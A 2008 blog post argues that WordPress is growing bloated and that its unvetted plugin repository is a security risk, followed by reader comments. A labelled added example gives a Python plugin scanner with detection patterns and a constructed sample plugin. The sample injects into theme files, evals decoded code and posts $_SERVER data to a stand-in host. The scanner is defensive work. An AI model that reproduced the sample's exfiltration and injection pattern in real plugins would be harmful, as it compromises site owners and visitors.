A Critical View of the Future of WordPress

WordPress is today by far the most widely used blogging platform on the Internet.

I have enjoyed using WordPress since I made it my "weapon of choice" over Movable Type and Drupal. I have spent a lot of time with WordPress and I love it.

But that also gives me an opportunity to express some of my concerns regarding the current state of WordPress and the direction it may be heading in. You often get the best critique from those who love you the most.

WordPress in Transition

With the rule-changing version 2.5 released a couple of months ago and the transitional 2.6 now current, we are headed for another rule-changing release, 2.7. It will have a new admin interface and will integrate the functionality of several popular plugins.

Like many other developers, I have been following this progress carefully, and I can tell you that the new versions have brought certain compatibility issues. Maintaining support for just a couple of plugins has become almost a full-time job, one that you, as a plugin developer, are usually not paid for. You can see that by taking a look at my plugin comments and the forum I opened specifically to handle support questions more efficiently.

Far and Wide Development

More importantly, I have noticed that WordPress is no longer developing "far"; it has started going "wide" instead. By this I mean there are fewer inventions and new technologies with every update, just more functionality built on top of the technology that already exists.

That makes the code base grow and become harder to manage, and it presents users with default solutions to their problems.

Speed and Choices Theory

I have a theory I call the "Speed and Choices Theory". It says that the faster a piece of software is, and the more choices it gives the user, the more successful it is likely to be with its user base. It applies to life in general, but here I apply it to WordPress.

Google and Yahoo Battle

To illustrate this, I'll compare Google and Yahoo back in the late 1990s.

Both were search engines and both were fighting for the number one spot. We all know who won, but how did Google pull it off?

Google set itself the goal of presenting search results in no more than half a second: 0.5 seconds was all the user had to wait to find what they needed. Yahoo was much slower, and it lost the first battle.

Yahoo also decided to fit all kinds of content onto its home page, something that would later become the Yahoo Directory; it basically offered default choices for the things you might be looking for.

If you wanted to find out more about a topic, you would be pointed to a site about it, recommended by Yahoo. That approach has its good side in keeping spam out, but on the other hand the user is deprived of choices; they are imposed instead. And so Yahoo lost that battle as well.

Speed and choices are everything on the Internet today.

WordPress is Slowing Down

WordPress started out like Google, but it is now becoming more and more like Yahoo. It has stopped going "far" and started getting fat ("wide"). It is becoming slow and clumsy.

Have you noticed how long the Write Post screen takes to load? How about adding an image? Why isn't this instantaneous?

The user has fewer choices with every new version as default solutions are built in.

Take a look at Chrome, the new browser from Google.

Take a look at Habari, the new and different blogging platform.

Ideally we want very fast, secure software that handles the basic purpose it was made for.

Since every user has different needs, everything else should be handled by external additions (plugins), leaving the core extremely small, efficient and scalable.

Even now I would say that 95% of users use only 5% of WordPress core functionality, mostly very simple tasks like writing a post and perhaps managing comments. With a new version like 2.7 this may shift to 97% and 3%.

Plugins in the Danger Zone

There are almost 3,000 plugins in the WordPress plugin repository at this time, downloaded almost 12,000,000 times in total. And anyone can submit a plugin to the repository, with no control over what goes in.

So what implications does that have?

A plugin running on your blog has (depending on your hosting setup) almost full control of your website: it is PHP code executed in the same process as WordPress itself, with the same file and database permissions. It can change your WordPress settings and your theme files. It can insert hidden code into your pages. It can change your pages; it can copy and move files on your server and, in some cases, even delete them. Every single plugin you have on your blog is capable of doing this.

By installing a plugin you are giving it complete authority to do whatever its author wants.

Would you trust your house to a complete stranger?

How many plugins do you have? A typical user most likely has around 10-15. What do you know about them? The typical user knows next to nothing.

Privacy and Security Issues

The privacy and security implications of plugins distributed this way are enormous.

While you can be fairly sure that WordPress core is free of any malicious behavior (there is at least a company to sue), whom do you blame if you suddenly find out that a certain plugin is sending your private information to a foreign server?

Surely such a thing would be discovered quickly, but even new and totally anonymous plugins get downloaded hundreds if not thousands of times by all sorts of users, including those who would never find out about the problem. The potential for damage is huge.
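As an added example (not code from the original post, and not part of WordPress), the following Python script performs the first check a plugin user could do before trusting one of those "totally anonymous" downloads: a line-by-line scan of a plugin's PHP source for the behaviours described in the two sections above, such as writing to theme files, calling out to remote servers with request data, and hiding code behind eval() or base64_decode(). The sample plugin source embedded in it is constructed for the example and is not a real plugin; the rule names and severities are this example's own choices.

```python
"""Static triage of a WordPress plugin's PHP source for the behaviours the
post warns about: writing theme files, phoning home, hidden code.
Added example; the sample plugin below is constructed, not a real plugin."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    severity: str
    pattern: re.Pattern


@dataclass(frozen=True)
class Finding:
    line: int
    rule: str
    severity: str
    text: str


# Rule names and severities are this example's own choices, not a standard.
RULES = (
    Rule("eval", "high", re.compile(r"\beval\s*\(")),
    Rule("shell", "high", re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(")),
    Rule("filesystem-write", "medium",
         re.compile(r"\b(file_put_contents|fwrite|fopen|copy|rename|unlink|rmdir|chmod)\s*\(")),
    Rule("remote-call", "medium",
         re.compile(r"\b(wp_remote_post|wp_remote_get|wp_remote_request|curl_init|curl_exec|fsockopen)\s*\(")),
    Rule("theme-path", "low",
         re.compile(r"\b(get_template_directory|get_stylesheet_directory|get_theme_root)\s*\(")),
    Rule("obfuscation", "low", re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")),
)

# Request data ($_SERVER, $_COOKIE, ...) leaving the site in a remote call is
# the "sending your private information to a foreign server" case.
SUPERGLOBAL = re.compile(r"\$_(SERVER|COOKIE|POST|GET|REQUEST|SESSION)\b")
COMMENT_PREFIXES = ("//", "#", "/*", "*")

# Constructed sample: the 'aGlkZGVu' blob just decodes to "hidden" and stands
# in for a real payload; example.invalid is a reserved, non-resolving domain.
SAMPLE_PLUGIN = r'''<?php
/*
Plugin Name: Example Widget
*/
add_action('init', 'ew_init');
function ew_init() {
    $payload = base64_decode('aGlkZGVu');
    $theme = get_template_directory() . '/footer.php';
    file_put_contents($theme, $payload, FILE_APPEND);
    wp_remote_post('http://example.invalid/collect', array('body' => $_SERVER));
    eval($payload);
}
'''


def scan_source(php_source: str) -> list[Finding]:
    """Return one Finding per (line, rule) hit, in line order then rule order."""
    findings = []
    for number, raw in enumerate(php_source.splitlines(), start=1):
        line = raw.strip()
        # Crude comment filter: skips comment-only lines, not trailing comments.
        if not line or line.startswith(COMMENT_PREFIXES):
            continue
        for rule in RULES:
            if rule.pattern.search(line):
                findings.append(Finding(number, rule.name, rule.severity, line))
                if rule.name == "remote-call" and SUPERGLOBAL.search(line):
                    findings.append(Finding(number, "exfiltration", "high", line))
    return findings


def summarize(findings: list[Finding]) -> dict:
    """Count findings per severity so a reader can decide whether to dig in."""
    counts = {"high": 0, "medium": 0, "low": 0}
    for finding in findings:
        counts[finding.severity] += 1
    return counts


if __name__ == "__main__":
    results = scan_source(SAMPLE_PLUGIN)
    for f in results:
        print(f"line {f.line:>3}  {f.severity:<6} {f.rule:<17} {f.text}")
    print(summarize(results))
```

A hit is a reason to read the surrounding code, not proof of malice: wp_remote_post() and file_put_contents() have legitimate uses, and the comment filter is deliberately crude. The scan also cannot see code that a plugin fetches or decodes only at run time, which is exactly why review of the source that actually lands in the repository matters.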

Nightmare Scenario

For example, if someone got hold of my plugin repository password and, let's say, modified the Smart Youtube plugin and pushed a new version, around 30,000 people might update it automatically (because they trust the built-in update function) and would now have a malicious plugin running on their blogs. It could install web malware or a privacy-invading tracker, or simply delete all your files.

What if that happened to the All in One SEO Pack plugin, the most downloaded WordPress plugin, with almost 400,000 installations?

Secure WordPress

Obviously this matter needs proper and urgent attention; the way it works now is a recipe for disaster.

The theme repository manually approves every theme, and even every update, before allowing it into the repository. The plugin repository, a potential source of much graver risk, doesn't.

Stricter rules

We need stricter rules for plugins. Start with coding standards, and inform developers of proper and transparent ways to do things in plugins. Then manually inspect every plugin that aspires to be accepted into the official plugin repository.

We need a permissions system for plugins, similar to user capabilities: plugin capabilities. They would define what a plugin is able to do on your system. Plugins inspected by the WordPress repository would get the highest trust level; less trusted plugins would have restricted access within your WordPress installation. And you, as the user, should be able to control the "trust" level of each plugin. The hard part is enforcement: a plugin is PHP code running in the same process as WordPress, so such restrictions can only be applied to what a plugin does through WordPress's own APIs, not to direct calls to PHP's file and network functions.

Let users choose what to install. If they decide to install a plugin from WordPress.org, we need to make sure it is not compromising their site. If they decide to install it from any other site, they should be aware of the risks of doing so.

We trust too much in the good intentions of Internet users, but not all of them are equal. WordPress has spread enough by now to become an interesting target for a large-scale malicious attack. It is a grave prospect, but it is not fictional.

Get Back on the "Far" Track

The future is about inventions, not interventions: more speed, security and choices.

The future lies in simplicity. Let's reinvent the famous one-click install.

WordPress is too good to miss the chance to make it even better.


Posted in: WordPress

16 Comments

  1. Mar 26th, 2009 6:31 PM

    WP is nice and all, I just hope they keep improving it and that a new release is in the works.

  2. Jan 17th, 2009 2:12 AM

    I enjoyed your rant. One thing you didn't mention, though, is that the "expansion" or "fatness" of WordPress is removing much of the need for plugins. That to me is a lifesaver.

    With WordPress 2.7, I've essentially ditched all but a few plugins (I only use five plugins). This makes things far easier, more secure and, just as importantly if you want to experiment with some of the thousands of pre-made WordPress themes... compatible.

    Additionally, I've had too many plugins that I relied on in the past just "vanish into the night," essentially rendering the pages that depended on them useless when I upgraded to new versions of WordPress (only to discover the plugins weren't compatible). Right now my site isn't dependent on any plugin at all, something I rather like. The site is enhanced by the handful of plugins I use, but it is no longer dependent on them (like when I relied on several photo gallery type plugins).

    I personally will take a bit "more fat" if that leads to features that remove the need for dozens of plugins.

  3. Oct 10th, 2008 9:42 AM

    I 100% agree with plugin repository issue. An awful lot of damage could be done with a stolen password.

    I'm particularly wary of some prat deciding to 'buy' a popular plugin from someone or even volunteering to take over the development. Imagine if the development of a major plugin was passed on to a spammer! The potential of serious damage to people's blogs, not to mention the reputation of WordPress, could be enormous.

    I disagree about the bloat issue though. My concerns are mainly with not introducing new bugs (HTML bugs in the gallery and admin panel CSS bugs in particular). The new features added of late and the new ones in the pipeline all seem reasonable to me. The core is still being kept fairly small. Having the core functionality makes it easier to add more advanced functionality to the system. For example, to build an advanced photos gallery you don't need to build in the basic functionality, you can build on top of the core system hence making it easier to setup and maintain. So in a way the new core features are making it easier for developers to create new and interesting plugins.

    It doesn't look like WordPress is intending to go down the Joomla route of adding everything imaginable to the core - and thankfully so!

  4. Oct 7th, 2008 10:10 PM

    10 to 15 plugins?

    I just checked, I have 146.
    Only about a third are active...

    I actually remember a poorly written plugin that was allowing me to customize my RSS feed with a copyright statement.

    I had to send an email to the developer to tell him that it seemed that every single one of my logged-in guests could do the exact same thing: change the copyright in my feed!

  5. Sep 20th, 2008 12:23 PM

    Great post, and I concur - speed and simplicity with some choice features, not bloat.

    Saying that, I don't know anything other than WP!

  6. Sep 15th, 2008 2:10 PM

    You're absolutely right about further development of WordPress. It should stay the way it was: simple to use and reliable in the first place. I was just impressed when I discovered WordPress after spending a whole summer holiday (in Tunisia with my family, bored to death there) trying to learn how to use Joomla! It was so complicated that I gave up! It seemed to me (at that point) that it would be easier to develop my own CMS than to learn the one mentioned above! Now, after upgrades to 2.6 I'm getting scared after each updated version of WordPress - what's gonna happen now and am I going to study the new functions like I'd never used it before!

  7. Sep 13th, 2008 9:07 PM

    Excellent critique!

  8. Sep 12th, 2008 9:55 PM

    Rudy, first 2.3 is insecure and you'll probably get hacked if you stay on it.

    But just as important - 2.3 is more bloatware than 2.6. We've learned *a ton* from serving billions of pageviews on WordPress.com and with each subsequent release we make it faster and more efficient despite adding new features. If WP gets 10% slower that means I have to order 80 new servers for WordPress.com to serve the same number of servers.

  9. Sep 12th, 2008 7:31 PM

    WordPress. Cannot live with it, cannot live without it...

    What bothers me most is when you put 2000 or so categories in the fresh installation, the Admin panels simply stop or function extremely slow. If you go to Manage Posts, or anything similar, the WP just ... dies.

    But we all still like it, and still use it, and plan to continue using it, and recommending it to anyone!

    That is WordPress.

    Ivan | SeoConsultant.ie

  10. Sep 12th, 2008 12:42 PM

    Excellent article with some well-made points. While I am eternally grateful to Matt for his contribution of WordPress, it does have room for improvement, as do all things. The speed issue is a problem for sure, but I had not given any thought to the plugin issue. Plugins also seem to slow the whole thing down, so I only use 2-3 at a time. (Matt, WordPress has changed the world, and it is refreshing to see your attitude about constructive criticism. You're remarkable.)

  11. Sep 11th, 2008 7:34 PM

    I would love to see WordPress do what Apple is doing with Snow Leopard - far fewer new features, greater emphasis on speed, stability and security. Not every new version needs to be a news maker, you know? WordPress has definitely evolved to the point where security and speed need to take center stage for a release or two.

  12. Sep 11th, 2008 11:35 AM

    Hey Vladimir

    That was one of the most interesting things I have read in a long time :) Thanks Dave

  13. Sep 10th, 2008 9:50 AM

    Matt: Thanks for joining in and considering the issues I was talking about. Great to have you as first commenter on the topic.

    I am very glad to hear you are speed obsessed, I know that's a special kind of developer and I am relieved to hear that. Speed is everything, it makes or breaks it.

    I am also very relieved to find out about the integrated control mechanism you talked about, actually this was my biggest concern. I would be happy to join the effort of further securing the WP repository. My email: vprelovac@gmail.com

    Kym: Thanks mate.

  14. Sep 10th, 2008 6:48 AM

    Good post Vlad. I've noticed myself the speed issue as of late.

    One of the things that drew me to WP was how fast and simple it was. Even with the gears option activated, the write page load is simply too long for me. Not to mention the image uploading - gosh...

    It's great to see the WP team and Matt working on improving things however. :)

    WP has a strong community behind it and it is posts like these that help it constantly improve.

  15. Sep 10th, 2008 3:01 AM

    I'm obsessed with speed. On the backend WP has done a ton to speed itself up, as evidenced by the fact that it now runs the largest blogs in the world. More than 1.6 billion pageviews a month are going through WordPress.

    However front-end performance is where the future is, as you mentioned the delay in loading the write page. Gears, where we've invested time, helps a ton, but there's still a lot more we can do. The good news is some of the best people in the industry are working on this problem specifically as it pertains to WordPress.

    The plugin issue is one I've thought of a lot. Luckily since we have the central repository we actually have a lot of control and protection. There are some automated things we do to watch out for bad stuff but ultimately I think we need a human team of volunteers to keep an eye on plugin changesets. Is this something you'd be interested in helping out with?

  16. Sep 9th, 2008 9:38 PM

    You got it right with WP going fat. A lot of people have been complaining about WP being bloatware in the first place, now they're just confirming it. I'm still sticking with WP 2.3, and with all the plugins I'm running, it's already bloatware.

    As long as it's secure and in working condition, I'm not going to upgrade.